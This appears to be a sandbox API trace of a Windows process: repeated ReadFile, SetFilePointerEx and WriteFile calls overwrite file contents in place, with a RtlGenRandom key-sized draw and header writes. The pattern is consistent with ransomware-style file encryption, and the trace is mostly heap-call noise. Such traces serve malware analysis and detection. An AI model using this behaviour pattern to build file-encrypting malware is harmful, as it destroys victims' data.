[0080.793] ReadFile (in: hFile=0x874, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.073] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.073] WriteFile (in: hFile=0x874, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.074] GetProcessHeap () returned 0x4f10000 [0081.074] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.075] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.076] GetProcessHeap () returned 0x4f10000 [0081.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.077] GetProcessHeap () returned 0x4f10000 [0081.078] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.078] GetProcessHeap () returned 0x4f10000 [0081.078] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.078] GetProcessHeap () returned 0x4f10000 [0081.078] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.081] GetProcessHeap () returned 0x4f10000 [0081.081] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.081] GetProcessHeap () returned 0x4f10000 [0081.081] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x874, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.082] WriteFile (in: hFile=0x874, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.082] WriteFile (in: hFile=0x874, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.082] GetProcessHeap () returned 0x4f10000 [0081.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.083] GetProcessHeap () returned 0x4f10000 [0081.083] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.083] GetProcessHeap () returned 0x4f10000 [0081.083] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.083] CloseHandle (hObject=0x874) returned 1 [0081.084] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 62 [0081.084] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.084] ReadFile (in: hFile=0x878, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.085] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.085] GetProcessHeap () returned 0x4f10000 [0081.085] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.085] GetProcessHeap () returned 0x4f10000 [0081.085] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.085] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.085] GetProcessHeap () returned 0x4f10000 [0081.085] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.085] ReadFile (in: hFile=0x878, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.196] WriteFile (in: hFile=0x878, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.196] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.196] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.197] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.197] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.198] GetProcessHeap () returned 0x4f10000 [0081.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.199] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] RtlAllocateHeap 